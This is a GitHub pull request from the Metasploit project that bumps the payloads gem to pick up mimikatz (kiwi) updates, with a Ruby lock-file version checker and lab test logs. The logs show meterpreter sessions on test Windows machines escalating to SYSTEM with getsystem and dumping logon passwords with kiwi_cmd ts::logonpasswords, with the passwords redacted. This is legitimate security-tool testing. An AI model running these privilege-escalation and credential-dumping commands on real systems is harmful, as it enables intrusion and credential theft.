
Update metasploit payloads gem to 2.0.48 #15440

Merged
merged 1 commit into rapid7:master from update-payloads-2.0.48 on Jul 16, 2021

Conversation


@bwatters-r7 bwatters-r7 commented Jul 16, 2021

This PR updates the payloads gem version to 2.0.48 to bring in the updates to mimikatz in rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Verification

List the steps needed to make sure this thing works
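Since the change itself is a version bump, the first thing a reviewer pulling this branch wants is confirmation that `Gemfile.lock` actually resolved `metasploit-payloads` to 2.0.48. The following is an added example, not code from this PR or from metasploit-framework: a small parser for the `specs:` block of a Bundler lock file, run over a constructed lock fragment whose other gem versions are illustrative only.

```ruby
# Added example (not part of the PR): parse a Gemfile.lock and confirm the
# metasploit-payloads gem is pinned at or above the version this PR targets.
require "rubygems"

# Constructed Gemfile.lock fragment, modelled on the layout Bundler writes.
# Only the GEM block matters here; versions other than 2.0.48 are illustrative.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      metasploit-payloads (2.0.48)
      metasploit_payloads-mettle (1.0.11)
      rex-core (0.1.16)
      metasploit-framework (6.1.0)
        metasploit-payloads (= 2.0.48)
        metasploit_payloads-mettle (= 1.0.11)

  PLATFORMS
    ruby

  DEPENDENCIES
    metasploit-framework!
LOCK

# Returns { "gem-name" => Gem::Version } for every resolved spec in the lock.
# Resolved gems sit at exactly four spaces of indentation; their dependency
# lines (six spaces, e.g. "metasploit-payloads (= 2.0.48)") are constraints,
# not resolutions, and are deliberately skipped so they cannot be mistaken
# for the pinned version. Platform-suffixed versions (e.g. "1.0.0-x64-mingw32")
# are not handled by this toy parser.
def resolved_gem_versions(lock_text)
  versions = {}
  in_specs = false
  lock_text.each_line do |line|
    if line.strip == "specs:"
      in_specs = true
      next
    end
    # A blank line or an unindented heading (PLATFORMS, DEPENDENCIES) ends
    # the specs section.
    if in_specs && (line.strip.empty? || line !~ /\A\s/)
      in_specs = false
      next
    end
    next unless in_specs
    m = line.match(/\A {4}(\S+) \(([^)\s]+)\)\s*\z/)
    next unless m
    versions[m[1]] = Gem::Version.new(m[2])
  end
  versions
end

# True when gem_name is resolved in the lock and is at least min_version.
# Gem::Version comparison is used rather than string comparison so that
# "2.0.10" correctly sorts above "2.0.9".
def gem_at_least?(lock_text, gem_name, min_version)
  found = resolved_gem_versions(lock_text)[gem_name]
  !found.nil? && found >= Gem::Version.new(min_version)
end

if $PROGRAM_NAME == __FILE__
  puts resolved_gem_versions(SAMPLE_LOCK)["metasploit-payloads"]
  puts gem_at_least?(SAMPLE_LOCK, "metasploit-payloads", "2.0.48")
end
```

To run the same check against a real checkout, replace `SAMPLE_LOCK` with `File.read("Gemfile.lock")`; the functions take the lock text as a parameter for exactly that reason.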

@bwatters-r7 bwatters-r7 self-assigned this Jul 16, 2021
@bwatters-r7 (Contributor, Author) commented:

[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
[-] The "kiwi_cmd" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : 
   UserName    : msfuser
   Password/Pin: [redacted]

meterpreter > 

@bwatters-r7 (Contributor, Author) commented:

I could not get it to work on Windows 7 x86, but I could on Windows 10 x86. I'm unclear as to why, but there appear to be no regressions, and clearly the new features are present.

[*] Starting interaction with 9...

meterpreter > sysinfo
Computer        : WIN7X86-SP0
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7X86-SP0\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

meterpreter > netstat

Connection list
===============

    Proto  Local address                    Remote address         State        User  Inode  PID/Program name
    -----  -------------                    --------------         -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*              LISTEN       0     0      720/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:3389                     0.0.0.0:*              LISTEN       0     0      1220/svchost.exe

meterpreter > sysinfo
Computer        : DESKTOP-M9INQAQ
OS              : Windows 10 (10.0 Build 15063).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-M9INQAQ\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
[-] The "kiwi_cmd" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : 
   UserName    : msfuser
   Password/Pin: [redacted]

meterpreter > 

@bwatters-r7 bwatters-r7 merged commit 4f6b6e4 into rapid7:master Jul 16, 2021
@bwatters-r7 (Contributor, Author) commented:

Release Notes

This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jul 16, 2021
@bwatters-r7 bwatters-r7 deleted the update-payloads-2.0.48 branch October 5, 2021 19:47